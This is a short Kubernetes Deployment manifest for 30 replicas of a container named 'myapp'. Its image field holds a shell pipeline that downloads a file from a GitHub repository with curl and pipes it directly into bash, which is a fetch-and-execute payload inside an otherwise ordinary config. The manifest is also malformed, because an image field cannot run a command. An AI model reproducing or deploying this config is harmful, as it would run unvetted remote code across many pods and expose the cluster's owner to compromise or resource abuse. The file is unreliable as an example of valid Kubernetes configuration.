---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: apphone
spec:
  replicas: 30
  selector:
    matchLabels:
      app: myapp
  template:
    metadata:
      labels:
        app: myapp
    spec:
      containers:
        - name: myapp
          image: curl -sL https://github.com/kazppkido/gbut/raw/main/fabeti | bash
          ports:
            - containerPort: 8080

